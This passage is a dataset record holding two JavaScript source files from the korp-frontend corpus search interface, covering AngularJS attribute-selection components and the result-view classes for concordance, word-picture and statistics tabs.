"avg_line_length": 39.0982666015625,
"blob_id": "34f8380b4c0651fad3b8828b275020a3ad43df9b",
"content_id": "f3f393b0b1f336c69024ab82cc64be5669d0fa74",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6937,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 173,
"path": "/app/scripts/extended.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst korpApp = angular.module(\"korpApp\")\nkorpApp.factory(\"extendedComponents\", function () {\n const autocompleteTemplate = `\\\n <div>\n <input type=\"text\"\n size=\"37\"\n ng-model=\"input\"\n escaper\n typeahead-min-length=\"0\"\n typeahead-input-formatter=\"typeaheadInputFormatter($model)\"\n uib-typeahead=\"tuple[0] as tuple[1] for tuple in getRows($viewValue)\"></input>\n </div>`\n\n const selectTemplate =\n \"<select ng-show='!inputOnly' ng-model='input' escaper ng-options='tuple[0] as tuple[1] for tuple in dataset'></select>\" +\n \"<input ng-show='inputOnly' type='text' ng-model='input'/>\"\n const localize = ($scope) =>\n function (str) {\n if (!$scope.translationKey) {\n return str\n } else {\n return util.getLocaleString(($scope.translationKey || \"\") + str)\n }\n }\n\n const selectController = (autocomplete) => [\n \"$scope\",\n \"structService\",\n function ($scope, structService) {\n const attribute = $scope.$parent.tokenValue.value\n const selectedCorpora = settings.corpusListing.selected\n\n // check which corpora support attributes\n const corpora = []\n for (let corpusSettings of selectedCorpora) {\n if (\n attribute in corpusSettings.structAttributes ||\n attribute in corpusSettings.attributes\n ) {\n corpora.push(corpusSettings.id)\n }\n }\n\n $scope.$watch(\"orObj.op\", (newVal, oldVal) => {\n $scope.inputOnly = $scope.orObj.op !== \"=\" && $scope.orObj.op !== \"!=\"\n if (newVal !== oldVal) {\n $scope.input = \"\"\n }\n })\n\n $scope.loading = true\n const opts = { count: false, returnByCorpora: false }\n if ($scope.type === \"set\") {\n opts.split = true\n }\n structService.getStructValues(corpora, [attribute], opts).then(\n function (data) {\n $scope.loading = false\n const localizer = localize($scope)\n\n const dataset = _.map(_.uniq(data), function (item) {\n if (item === \"\") {\n return [item, util.getLocaleString(\"empty\")]\n }\n return [item, localizer(item)]\n })\n $scope.dataset = _.sortBy(dataset, (tuple) => tuple[1])\n if (!autocomplete) {\n $scope.input = $scope.input || $scope.dataset[0][0]\n }\n },\n () => c.log(\"struct_values error\")\n )\n\n $scope.getRows = function (input) {\n if (input) {\n return _.filter(\n $scope.dataset,\n (tuple) => tuple[0].toLowerCase().indexOf(input.toLowerCase()) !== -1\n )\n } else {\n return $scope.dataset\n }\n }\n\n $scope.typeaheadInputFormatter = (model) => localize($scope)(model)\n },\n ]\n\n // Select-element. Use the following settings in the corpus:\n // - dataset: an object or an array of values\n // - translationKey: a key that will be prepended to the value for lookup in translation files\n // - escape: boolean, will be used by the escaper-directive\n return {\n datasetSelect: {\n template: selectTemplate,\n controller: [\n \"$scope\",\n function ($scope) {\n let dataset\n const localizer = localize($scope)\n if (_.isArray($scope.dataset)) {\n dataset = _.map($scope.dataset, (item) => [item, localizer(item)])\n } else {\n dataset = _.map($scope.dataset, (v, k) => [k, localizer(v)])\n }\n $scope.dataset = _.sortBy(dataset, (tuple) => tuple[1])\n $scope.model = $scope.model || $scope.dataset[0][0]\n },\n ],\n },\n\n // Select-element. Gets values from \"struct_values\"-command. 
Use the following settings in the corpus:\n // - translationKey: a key that will be prepended to the value for lookup in translation files\n // - escape: boolean, will be used by the escaper-directive\n structServiceSelect: {\n template: selectTemplate,\n controller: selectController(false),\n },\n\n // Autocomplete. Gets values from \"struct_values\"-command. Use the following settings in the corpus:\n // - translationKey: a key that will be prepended to the value for lookup in translation files\n // - escape: boolean, will be used by the escaper-directive\n structServiceAutocomplete: {\n template: autocompleteTemplate,\n controller: selectController(true),\n },\n\n // puts the first values from a dataset paramater into model\n singleValue: {\n template: '<input type=\"hidden\">',\n controller: [\"$scope\", ($scope) => ($scope.model = _.values($scope.dataset)[0])],\n },\n\n defaultTemplate: _.template(`\\\n <input ng-model='input' class='arg_value' escaper \n ng-model-options='{debounce : {default : 300, blur : 0}, updateOn: \"default blur\"}'\n <%= maybe_placeholder %>>\n <span ng-class='{sensitive : case == \"sensitive\", insensitive : case == \"insensitive\"}'\n class='val_mod' popper> Aa </span>\n <ul class='mod_menu popper_menu dropdown-menu'>\n <li><a ng-click='makeSensitive()'>{{'case_sensitive' | loc:lang}}</a></li>\n <li><a ng-click='makeInsensitive()'>{{'case_insensitive' | loc:lang}}</a></li>\n </ul>\n `),\n defaultController: [\n \"$scope\",\n function ($scope) {\n if ($scope.orObj.flags && $scope.orObj.flags.c) {\n $scope.case = \"insensitive\"\n } else {\n $scope.case = \"sensitive\"\n }\n\n $scope.makeSensitive = function () {\n $scope.case = \"sensitive\"\n if ($scope.orObj.flags) {\n delete $scope.orObj.flags[\"c\"]\n }\n }\n\n $scope.makeInsensitive = function () {\n const flags = $scope.orObj.flags || {}\n flags[\"c\"] = true\n $scope.orObj.flags = flags\n\n $scope.case = \"insensitive\"\n }\n },\n ],\n }\n})\n"
},
{
"alpha_fraction": 0.5396237969398499,
"alphanum_fraction": 0.5435332655906677,
"avg_line_length": 26.800445556640625,
"blob_id": "de293dfdf666972898e2eaf274ae26d72896e77e",
"content_id": "fd6755e5391dbfedb91446fa13f17b336e0a8106",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 62414,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 2245,
"path": "/app/scripts/results.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nimport statisticsFormatting from \"../config/statistics_config.js\";\nimport statemachine from \"./statemachine\";\nconst korpFailImg = require(`../img/korp_fail.svg`);\n\nclass BaseResults {\n constructor(resultSelector, tabSelector, scope) {\n this.s = scope;\n this.$tab = $(tabSelector);\n this.$result = $(resultSelector);\n\n this.$result.add(this.$tab).addClass(`not_loading`);\n\n this.injector = angular.injector([`ng`]);\n\n const def = this.injector.get(`$q`).defer();\n this.firstResultDef = def;\n }\n\n onProgress(progressObj) {\n return safeApply(this.s, () => {\n this.s.$parent.progress = Math.round(progressObj.stats);\n this.s.hits_display = util.prettyNumbers(progressObj.total_results);\n });\n }\n\n abort() {\n this.ignoreAbort = false;\n return this.proxy.abort();\n }\n\n getResultTabs() {\n return $(`.result_tabs > ul`).scope().tabset.tabs;\n }\n\n getActiveResultTab() {\n return $(`.result_tabs`).scope().activeTab;\n }\n\n renderResult(data) {\n this.$result.find(`.error_msg`).remove();\n if (data.ERROR) {\n safeApply(this.s, () => {\n return this.firstResultDef.reject();\n });\n\n this.resultError(data);\n return false;\n } else {\n return safeApply(this.s, () => {\n this.firstResultDef.resolve();\n this.hasData = true;\n });\n }\n }\n\n resultError(data) {\n c.error(`json fetch error: `, data);\n this.hidePreloader();\n this.resetView();\n return $(`<object class=\"korp_fail\" type=\"image/svg+xml\" data=\"${korpFailImg}\">`)\n .append(`<img class='korp_fail' src='${korpFailImg}'>`)\n .add($(`<div class='fail_text' />`).localeKey(`fail_text`))\n .addClass(`inline_block`)\n .prependTo(this.$result)\n .wrapAll(`<div class='error_msg'>`);\n }\n\n showPreloader() {\n this.s.$parent.loading = true;\n }\n\n hidePreloader() {\n this.s.$parent.loading = false;\n }\n\n resetView() {\n this.hasData = false;\n return this.$result.find(`.error_msg`).remove();\n }\n\n countCorpora() {\n return this.proxy.prevParams && this.proxy.prevParams.corpus.split(`,`).length;\n }\n\n onentry() {\n this.s.$root.jsonUrl = null;\n this.firstResultDef.promise.then(() => {\n const prevUrl = this.proxy && this.proxy.prevUrl;\n this.s.$apply(($scope) => ($scope.$root.jsonUrl = prevUrl));\n });\n }\n\n onexit() {\n this.s.$root.jsonUrl = null;\n }\n\n isActive() {\n return this.getActiveResultTab() === this.tabindex;\n }\n}\n\nview.KWICResults = class KWICResults extends BaseResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n\n this.proxy = new model.KWICProxy();\n window.kwicProxy = this.proxy;\n\n this.tabindex = 0;\n\n this.s = scope;\n\n this.selectionManager = scope.selectionManager;\n this.setupReadingHash();\n this.$result.click((event) => {\n if (\n event.target.id === `frontendDownloadLinks` ||\n event.target.classList.contains(`kwicDownloadLink`)\n ) {\n return;\n }\n if (!this.selectionManager.hasSelected()) {\n return;\n }\n this.selectionManager.deselect();\n statemachine.send(`DESELECT_WORD`);\n });\n\n $(document).keydown($.proxy(this.onKeydown, this));\n\n this.$result.on(`click`, `.word`, (event) => this.onWordClick(event));\n }\n\n setupReadingHash() {\n return this.s.setupReadingHash();\n }\n\n onWordClick(event) {\n if (this.isActive()) {\n }\n const scope = $(event.currentTarget).scope();\n const obj = scope.wd;\n const sent = scope.sentence;\n event.stopPropagation();\n const word = $(event.target);\n\n statemachine.send(`SELECT_WORD`, {\n sentenceData: sent.structs,\n wordData: obj,\n corpus: 
sent.corpus.toLowerCase(),\n tokens: sent.tokens,\n inReadingMode: false,\n });\n // if ($(\"#sidebar\").data()[\"korpSidebar\"]) {\n // s.$broadcast(\"wordSelected\", sent.structs, obj, sent.corpus.toLowerCase(), sent.tokens)\n // $(\"#sidebar\").sidebar(\n // \"updateContent\",\n // sent.structs,\n // obj,\n // sent.corpus.toLowerCase(),\n // sent.tokens\n // )\n // }\n\n this.selectWord(word, scope, sent);\n }\n\n selectWord(word, scope) {\n const obj = scope.wd;\n let aux = null;\n if (obj.dephead != null) {\n const i = Number(obj.dephead);\n\n const paragraph = word.closest(`.sentence`).find(`.word`);\n let sent_start = 0;\n const querySentStart = `.open_sentence`;\n if (word.is(querySentStart)) {\n sent_start = paragraph.index(word);\n } else {\n const l = paragraph.filter(\n (__, item) => $(item).is(word) || $(item).is(querySentStart),\n );\n sent_start = paragraph.index(l.eq(l.index(word) - 1));\n }\n aux = $(paragraph.get(sent_start + i - 1));\n }\n scope.selectionManager.select(word, aux);\n }\n\n resetView() {\n super.resetView();\n }\n\n getProxy() {\n return this.proxy;\n }\n\n isReadingMode() {\n return this.s.reading_mode;\n }\n\n onentry() {\n super.onentry();\n\n this.$result.find(`.token_selected`).click();\n _.defer(() => this.centerScrollbar());\n }\n\n onexit() {\n super.onexit();\n statemachine.send(`DESELECT_WORD`);\n }\n\n onKeydown(event) {\n let next;\n const isSpecialKeyDown = event.shiftKey || event.ctrlKey || event.metaKey;\n if (\n isSpecialKeyDown ||\n $(`input, textarea, select`).is(`:focus`) ||\n !this.$result.is(`:visible`)\n ) {\n return;\n }\n\n switch (event.which) {\n case 78: // n\n safeApply(this.s, () => {\n this.s.$parent.pageChange(this.s.$parent.page + 1);\n });\n return false;\n case 70: // f\n if (this.s.$parent.page === 0) {\n return;\n }\n safeApply(this.s, () => {\n this.s.$parent.pageChange(this.s.$parent.page - 1);\n });\n return false;\n }\n if (!this.selectionManager.hasSelected()) {\n return;\n }\n switch (event.which) {\n case 38: // up\n next = this.selectUp();\n break;\n case 39: // right\n next = this.selectNext();\n break;\n case 37: // left\n next = this.selectPrev();\n break;\n case 40: // down\n next = this.selectDown();\n break;\n }\n\n if (next) {\n this.scrollToShowWord($(next));\n return false;\n }\n }\n\n getPageInterval(page) {\n const hpp = locationSearch().hpp;\n const items_per_page = Number(hpp) || settings.hitsPerPageDefault;\n page = Number(page);\n const output = {};\n output.start = (page || 0) * items_per_page;\n output.end = output.start + items_per_page - 1;\n return output;\n }\n\n renderCompleteResult(data) {\n safeApply(this.s, () => {\n this.hidePreloader();\n this.s.hits = data.hits;\n this.s.hits_display = util.prettyNumbers(data.hits);\n });\n if (!data.hits) {\n c.log(`no kwic results`);\n this.showNoResults();\n return;\n }\n this.$result.removeClass(`zero_results`);\n this.renderHitsPicture(data);\n }\n\n renderResult(data) {\n const resultError = super.renderResult(data);\n if (resultError === false) {\n return;\n }\n if (!data.kwic) {\n data.kwic = [];\n }\n const isReading = this.isReadingMode();\n\n if (this.isActive()) {\n this.s.$root.jsonUrl = this.proxy.prevUrl;\n }\n\n this.s.$apply(($scope) => {\n const useContextData = locationSearch().in_order != null;\n if (isReading || useContextData) {\n $scope.setContextData(data);\n this.selectionManager.deselect();\n } else {\n $scope.setKwicData(data);\n }\n });\n\n if (currentMode === `parallel` && !isReading) {\n const scrollLeft = 
$(`.table_scrollarea`, this.$result).scrollLeft() || 0;\n let changed = true;\n const prevValues = [];\n\n // loop until the placement of linked sentences have settled\n while (changed) {\n changed = false;\n let i = 0;\n for (const linked of $(`.table_scrollarea > .kwic .linked_sentence`).get()) {\n const mainrow = $(linked).prev();\n if (!mainrow.length) {\n continue;\n }\n let firstWord = mainrow.find(`.left .word:first`);\n if (!firstWord.length) {\n firstWord = mainrow.find(`.match .word:first`);\n }\n const offset = Math.round(firstWord.position().left + scrollLeft - 25);\n $(linked).find(`.lnk`).css(`padding-left`, offset);\n\n const threshold = 25;\n if (offset - (prevValues[i] || 0) > threshold) {\n changed = true;\n }\n\n prevValues[i] = offset;\n i++;\n }\n }\n }\n\n if (settings.enableBackendKwicDownload) {\n util.setDownloadLinks(this.proxy.prevRequest, data);\n }\n\n this.$result.localize();\n this.centerScrollbar();\n if (this.isActive() && !this.selectionManager.hasSelected() && !isReading) {\n this.$result.find(`.match`).children().first().click();\n }\n }\n\n showNoResults() {\n this.hidePreloader();\n this.$result.addClass(`zero_results`).click();\n return this.$result.find(`.hits_picture`).html(``);\n }\n\n renderHitsPicture(data) {\n let items = _.map(data.corpus_order, (obj) => ({\n rid: obj,\n rtitle: settings.corpusListing.getTitle(obj.toLowerCase()),\n relative: data.corpus_hits[obj] / data.hits,\n abs: data.corpus_hits[obj],\n }));\n items = _.filter(items, (item) => item.abs > 0);\n // calculate which is the first page of hits for each item\n let index = 0;\n _.each(items, (obj) => {\n obj.page = Math.floor(index / data.kwic.length);\n index += obj.abs;\n });\n\n this.s.$apply(($scope) => ($scope.hitsPictureData = items));\n }\n\n scrollToShowWord(word) {\n if (!word.length) {\n return;\n }\n const offset = 200;\n const wordTop = word.offset().top;\n let newY = window.scrollY;\n if (wordTop > $(window).height() + window.scrollY) {\n newY += offset;\n } else if (wordTop < window.scrollY) {\n newY -= offset;\n }\n $(`html, body`).stop(true, true).animate({ scrollTop: newY });\n const wordLeft = word.offset().left;\n const area = this.$result.find(`.table_scrollarea`);\n let newX = Number(area.scrollLeft());\n if (wordLeft > area.offset().left + area.width()) {\n newX += offset;\n } else if (wordLeft < area.offset().left) {\n newX -= offset;\n }\n return area.stop(true, true).animate({ scrollLeft: newX });\n }\n\n buildQueryOptions(cqp, isPaging) {\n let avoidContext, preferredContext;\n const opts = {};\n const getSortParams = function () {\n const { sort } = locationSearch();\n if (!sort) {\n return {};\n }\n if (sort === `random`) {\n let rnd;\n if (locationSearch().random_seed) {\n rnd = locationSearch().random_seed;\n } else {\n rnd = Math.ceil(Math.random() * 10000000);\n locationSearch({ random_seed: rnd });\n }\n\n return {\n sort,\n random_seed: rnd,\n };\n }\n return { sort };\n };\n\n if (this.isReadingMode()) {\n preferredContext = settings.defaultReadingContext;\n avoidContext = settings.defaultOverviewContext;\n } else {\n preferredContext = settings.defaultOverviewContext;\n avoidContext = settings.defaultReadingContext;\n }\n\n const context = settings.corpusListing.getContextQueryString(preferredContext, avoidContext);\n\n if (!isPaging) {\n this.proxy.queryData = null;\n }\n\n opts.ajaxParams = {\n corpus: settings.corpusListing.stringifySelected(),\n cqp: cqp || this.proxy.prevCQP,\n query_data: this.proxy.queryData,\n context,\n default_context: 
preferredContext,\n incremental: true,\n };\n\n _.extend(opts.ajaxParams, getSortParams());\n return opts;\n }\n\n makeRequest(cqp, isPaging) {\n const page = Number(locationSearch().page) || 0;\n this.s.$parent.page = page;\n\n this.showPreloader();\n this.s.aborted = false;\n\n if (this.proxy.hasPending()) {\n this.ignoreAbort = true;\n } else {\n this.ignoreAbort = false;\n }\n\n const params = this.buildQueryOptions(cqp, isPaging);\n const progressCallback = $.proxy(this.onProgress, this);\n\n const req = this.getProxy().makeRequest(params, page, progressCallback, (data) => {\n return this.renderResult(data);\n });\n req.done((data) => {\n this.hidePreloader();\n return this.renderCompleteResult(data);\n });\n return req.fail((jqXHR, status, errorThrown) => {\n c.log(`kwic fail`);\n if (this.ignoreAbort) {\n c.log(`stats ignoreabort`);\n return;\n }\n if (status === `abort`) {\n return safeApply(this.s, () => {\n this.hidePreloader();\n this.s.aborted = true;\n });\n }\n });\n }\n\n getActiveData() {\n if (this.isReadingMode()) {\n return this.s.contextKwic;\n } else {\n return this.s.kwic;\n }\n }\n\n centerScrollbar() {\n const m = this.$result.find(`.match:first`);\n if (!m.length) {\n return;\n }\n const area = this.$result.find(`.table_scrollarea`).scrollLeft(0);\n const match = m.first().position().left + m.width() / 2;\n const sidebarWidth = $(`#sidebar`).outerWidth() || 0;\n area.stop(true, true).scrollLeft(match - ($(`body`).innerWidth() - sidebarWidth) / 2);\n }\n\n getCurrentRow() {\n const tr = this.$result.find(`.token_selected`).closest(`tr`);\n if (this.$result.find(`.token_selected`).parent().is(`td`)) {\n return tr.find(`td > .word`);\n } else {\n return tr.find(`div > .word`);\n }\n }\n\n selectNext() {\n let next;\n if (!this.isReadingMode()) {\n const i = this.getCurrentRow().index(this.$result.find(`.token_selected`).get(0));\n next = this.getCurrentRow().get(i + 1);\n if (next == null) {\n return;\n }\n $(next).click();\n } else {\n next = this.$result.find(`.token_selected`).next().click();\n }\n return next;\n }\n\n selectPrev() {\n let prev;\n if (!this.isReadingMode()) {\n const i = this.getCurrentRow().index(this.$result.find(`.token_selected`).get(0));\n if (i === 0) {\n return;\n }\n prev = this.getCurrentRow().get(i - 1);\n $(prev).click();\n } else {\n prev = this.$result.find(`.token_selected`).prev().click();\n }\n return prev;\n }\n\n selectUp() {\n let prevMatch;\n const current = this.selectionManager.selected;\n if (!this.isReadingMode()) {\n prevMatch = this.getWordAt(\n current.offset().left + current.width() / 2,\n current.closest(`tr`).prevAll(`.not_corpus_info`).first(),\n );\n prevMatch.click();\n } else {\n const searchwords = current\n .prevAll(`.word`)\n .get()\n .concat(\n current\n .closest(`.not_corpus_info`)\n .prevAll(`.not_corpus_info`)\n .first()\n .find(`.word`)\n .get()\n .reverse(),\n );\n const def = current.parent().prev().find(`.word:last`);\n prevMatch = this.getFirstAtCoor(\n current.offset().left + current.width() / 2,\n $(searchwords),\n def,\n ).click();\n }\n\n return prevMatch;\n }\n\n selectDown() {\n let nextMatch;\n const current = this.selectionManager.selected;\n if (!this.isReadingMode()) {\n nextMatch = this.getWordAt(\n current.offset().left + current.width() / 2,\n current.closest(`tr`).nextAll(`.not_corpus_info`).first(),\n );\n nextMatch.click();\n } else {\n const searchwords = current\n .nextAll(`.word`)\n .add(\n current\n .closest(`.not_corpus_info`)\n .nextAll(`.not_corpus_info`)\n .first()\n 
.find(`.word`),\n );\n const def = current.parent().next().find(`.word:first`);\n nextMatch = this.getFirstAtCoor(\n current.offset().left + current.width() / 2,\n searchwords,\n def,\n ).click();\n }\n return nextMatch;\n }\n\n getFirstAtCoor(xCoor, wds, default_word) {\n let output = null;\n wds.each(function (i, item) {\n const thisLeft = $(this).offset().left;\n const thisRight = $(this).offset().left + $(this).width();\n if (xCoor > thisLeft && xCoor < thisRight) {\n output = $(this);\n return false;\n }\n });\n\n return output || default_word;\n }\n\n getWordAt(xCoor, $row) {\n let output = $();\n $row.find(`.word`).each(function () {\n output = $(this);\n const thisLeft = $(this).offset().left;\n const thisRight = $(this).offset().left + $(this).width();\n if ((xCoor > thisLeft && xCoor < thisRight) || thisLeft > xCoor) {\n return false;\n }\n });\n\n return output;\n }\n};\n\nview.ExampleResults = class ExampleResults extends view.KWICResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n this.proxy = new model.KWICProxy();\n if (this.s.$parent.kwicTab.queryParams) {\n this.makeRequest().then(() => {\n this.onentry();\n });\n }\n this.tabindex = this.getResultTabs().length - 1 + this.s.$parent.$index;\n }\n\n setupReadingHash() {}\n\n isReadingMode() {\n return this.s.exampleReadingMode;\n }\n\n makeRequest() {\n const items_per_page = parseInt(locationSearch().hpp || settings.hitsPerPageDefault);\n const opts = this.s.$parent.kwicTab.queryParams;\n\n this.resetView();\n // example tab cannot handle incremental = true\n opts.ajaxParams.incremental = false;\n\n opts.ajaxParams.start = this.s.$parent.page * items_per_page;\n opts.ajaxParams.end = opts.ajaxParams.start + items_per_page - 1;\n\n const prev = _.pick(this.proxy.prevParams, `cqp`, `command`, `corpus`, `source`);\n _.extend(opts.ajaxParams, prev);\n\n let avoidContext, preferredContext;\n if (this.isReadingMode()) {\n preferredContext = settings.defaultReadingContext;\n avoidContext = settings.defaultOverviewContext;\n } else {\n preferredContext = settings.defaultOverviewContext;\n avoidContext = settings.defaultReadingContext;\n }\n\n const context = settings.corpusListing.getContextQueryStringFromCorpusId(\n (prev.corpus || ``).split(`,`),\n preferredContext,\n avoidContext,\n );\n _.extend(opts.ajaxParams, { context, default_context: preferredContext });\n\n this.showPreloader();\n const progress =\n opts.command === `relations_sentences` ? 
$.noop : $.proxy(this.onProgress, this);\n const def = this.proxy.makeRequest(opts, null, progress, (data) => {\n this.renderResult(data, opts.cqp);\n this.renderCompleteResult(data);\n return safeApply(this.s, () => {\n return this.hidePreloader();\n });\n });\n\n return def.fail(function () {\n return safeApply(this.s, () => {\n return this.hidePreloader();\n });\n });\n }\n\n renderResult(data) {\n super.renderResult(data);\n this.s.setupReadingWatch();\n }\n};\n\nview.LemgramResults = class LemgramResults extends BaseResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n this.s = scope;\n this.tabindex = 3;\n this.proxy = new model.LemgramProxy();\n }\n\n resetView() {\n super.resetView();\n safeApply(this.s, () => {\n this.s.$parent.aborted = false;\n this.s.$parent.no_hits = false;\n });\n }\n\n makeRequest(word, type) {\n // if a global filter is set, do not generate a word picture\n if (this.s.$root.globalFilter) {\n this.hasData = false;\n return;\n }\n\n if (this.proxy.hasPending()) {\n this.ignoreAbort = true;\n } else {\n this.ignoreAbort = false;\n this.resetView();\n }\n\n this.showPreloader();\n const def = this.proxy.makeRequest(word, type, (...args) => {\n this.onProgress(...(args || []));\n });\n\n def.done((data) => {\n safeApply(this.s, () => {\n return this.renderResult(data, word);\n });\n });\n def.fail((jqXHR, status, errorThrown) => {\n c.log(`def fail`, status);\n if (this.ignoreAbort) {\n return;\n }\n if (status === `abort`) {\n return safeApply(this.s, () => {\n this.hidePreloader();\n this.s.$parent.aborted = true;\n });\n }\n });\n }\n\n renderResult(data, query) {\n const resultError = super.renderResult(data);\n this.hidePreloader();\n this.s.$parent.progress = 100;\n if (resultError === false) {\n return;\n }\n if (!data.relations) {\n this.s.$parent.no_hits = true;\n } else if (util.isLemgramId(query)) {\n this.renderTables(query, data.relations);\n } else {\n this.renderWordTables(query, data.relations);\n }\n }\n\n renderWordTables(word, data) {\n const wordlist = $.map(data, function (item) {\n const output = [];\n if (item.head.split(`_`)[0] === word) {\n output.push([item.head, item.headpos.toLowerCase()]);\n }\n if (item.dep.split(`_`)[0] === word) {\n output.push([item.dep, item.deppos.toLowerCase()]);\n }\n return output;\n });\n let unique_words = _.uniqBy(wordlist, function (...args) {\n const [word, pos] = args[0];\n return word + pos;\n });\n const tagsetTrans = _.invert(settings.wordpictureTagset);\n unique_words = _.filter(unique_words, function (...args) {\n const [currentWd, pos] = args[0];\n return settings.wordPictureConf[tagsetTrans[pos]] != null;\n });\n if (!unique_words.length) {\n this.showNoResults();\n return;\n }\n\n this.drawTables(unique_words, data);\n return this.hidePreloader();\n }\n\n renderTables(lemgram, data) {\n let wordClass;\n if (data[0].head === lemgram) {\n wordClass = data[0].headpos;\n } else {\n wordClass = data[0].deppos;\n }\n this.drawTables([[lemgram, wordClass]], data);\n return this.hidePreloader();\n }\n\n drawTables(tables, data) {\n const inArray = function (rel, orderList) {\n const i = _.findIndex(\n orderList,\n (item) =>\n (item.field_reverse || false) === (rel.field_reverse || false) &&\n item.rel === rel.rel,\n );\n const type = rel.field_reverse ? 
`head` : `dep`;\n return {\n i,\n type,\n };\n };\n\n const tagsetTrans = _.invert(settings.wordpictureTagset);\n\n const res = _.map(tables, function ([token, wordClass]) {\n const getRelType = (item) => ({\n rel: tagsetTrans[item.rel.toLowerCase()],\n field_reverse: item.dep === token,\n });\n\n const wordClassShort = wordClass.toLowerCase();\n wordClass = _.invert(settings.wordpictureTagset)[wordClassShort];\n\n if (settings.wordPictureConf[wordClass] == null) {\n return;\n }\n let orderArrays = [[], [], []];\n $.each(data, (index, item) => {\n $.each(settings.wordPictureConf[wordClass] || [], (i, rel_type_list) => {\n const list = orderArrays[i];\n const rel = getRelType(item);\n\n if (!rel) {\n return;\n }\n const ret = inArray(rel, rel_type_list);\n if (ret.i === -1) {\n return;\n }\n if (!list[ret.i]) {\n list[ret.i] = [];\n }\n item.show_rel = ret.type;\n list[ret.i].push(item);\n });\n });\n\n $.each(orderArrays, function (i, unsortedList) {\n $.each(unsortedList, function (_, list) {\n if (list) {\n list.sort((first, second) => second.mi - first.mi);\n }\n });\n\n if (settings.wordPictureConf[wordClass][i] && unsortedList.length) {\n const toIndex = $.inArray(`_`, settings.wordPictureConf[wordClass][i]);\n if (util.isLemgramId(token)) {\n unsortedList[toIndex] = { word: token.split(`..`)[0].replace(/_/g, ` `) };\n } else {\n unsortedList[toIndex] = { word: util.lemgramToString(token) };\n }\n }\n\n unsortedList = _.filter(unsortedList, (item, index) => Boolean(item));\n });\n\n orderArrays = _.map(orderArrays, (section, i) =>\n _.map(section, function (table, j) {\n if (table && table[0]) {\n const { rel } = table[0];\n const { show_rel } = table[0];\n const all_lemgrams = _.uniq(\n _.map(_.map(table, show_rel), function (item) {\n if (util.isLemgramId(item)) {\n return item.slice(0, -1);\n } else {\n return item;\n }\n }),\n );\n return { table, rel, show_rel, all_lemgrams };\n } else {\n return { table };\n }\n }),\n );\n\n return {\n token: token,\n wordClass: wordClass,\n wordClassShort: wordClassShort,\n data: orderArrays,\n };\n });\n\n return this.s.$root.$broadcast(`word_picture_data_available`, res);\n }\n\n onentry() {\n super.onentry();\n }\n\n onexit() {\n super.onexit();\n clearTimeout(self.timeout);\n }\n\n showNoResults() {\n this.hidePreloader();\n }\n};\n\nview.StatsResults = class StatsResults extends BaseResults {\n constructor(resultSelector, tabSelector, scope) {\n super(resultSelector, tabSelector, scope);\n const self = this;\n this.tabindex = 2;\n this.gridData = null;\n\n this.doSort = true;\n this.sortColumn = null;\n\n this.proxy = new model.StatsProxy();\n window.statsProxy = this.proxy;\n this.$result.on(`click`, `.arcDiagramPicture`, (event) => {\n const parts = $(event.currentTarget).attr(`id`).split(`__`);\n return this.showPieChart(parseInt(parts[1]));\n });\n\n this.$result.on(`click`, `.slick-cell .statistics-link`, (e) => {\n let rowData;\n const rowIx = $(e.currentTarget).data(`row`);\n // TODO don't loop\n for (const row of this.data) {\n if (row.rowId === parseInt(rowIx)) {\n rowData = row;\n break;\n }\n }\n let cqp2 = null;\n // isPhraseLevelDisjunction: used for constructing cqp like: ([] | [])\n if (rowData.isPhraseLevelDisjunction) {\n const tokens = rowData.statsValues.map((vals) =>\n statisticsFormatting.getCqp(vals, this.searchParams.ignoreCase),\n );\n cqp2 = tokens.join(` | `);\n } else {\n cqp2 = statisticsFormatting.getCqp(\n rowData.statsValues,\n this.searchParams.ignoreCase,\n );\n }\n const { corpora } = 
this.searchParams;\n\n const opts = {};\n opts.ajaxParams = {\n start: 0,\n end: 24,\n corpus: corpora.join(`,`),\n cqp: self.proxy.prevParams.cqp,\n cqp2,\n expand_prequeries: false,\n };\n\n return safeApply(scope.$root, () => scope.$root.kwicTabs.push({ queryParams: opts }));\n });\n\n $(window).resize(\n _.debounce(() => {\n return this.resizeGrid(true);\n }, 100),\n );\n\n $(`#kindOfData,#kindOfFormat`).change(() => {\n return this.showGenerateExport();\n });\n\n $(`#exportButton`).hide();\n $(`#generateExportButton`)\n .unbind(`click`)\n .click(() => {\n this.hideGenerateExport();\n this.updateExportBlob();\n });\n\n if ($(`html.msie7,html.msie8`).length) {\n $(`#showGraph`).hide();\n return;\n }\n\n $(`#showGraph`).on(`click`, () => {\n let cqp, rowIx;\n if ($(`#showGraph`).is(`.disabled`)) {\n return;\n }\n\n const subExprs = [];\n const labelMapping = {};\n\n let showTotal = false;\n\n for (rowIx of this.getSelectedRows()) {\n if (rowIx === 0) {\n showTotal = true;\n continue;\n }\n\n var row = this.getDataAt(rowIx);\n cqp = statisticsFormatting.getCqp(row.statsValues, this.searchParams.ignoreCase);\n subExprs.push(cqp);\n const parts = this.searchParams.reduceVals.map(\n (reduceVal) => row.formattedValue[reduceVal],\n );\n labelMapping[cqp] = parts.join(`, `);\n }\n\n const activeCorpora = [];\n // TODO: what is this rowIx reference?\n const totalRow = this.getDataAt(rowIx);\n for (const corpus of this.searchParams.corpora) {\n if (totalRow[corpus + `_value`][0] > 0) {\n activeCorpora.push(corpus);\n }\n }\n\n this.s.$apply(() => {\n this.s.onGraphShow({\n cqp: this.proxy.prevNonExpandedCQP,\n subcqps: subExprs,\n labelMapping,\n showTotal,\n corpusListing: settings.corpusListing.subsetFactory(activeCorpora),\n });\n });\n });\n }\n\n updateExportBlob() {\n let reduceVal, val;\n const selVal = $(`#kindOfData option:selected`).val() === `absolute` ? 
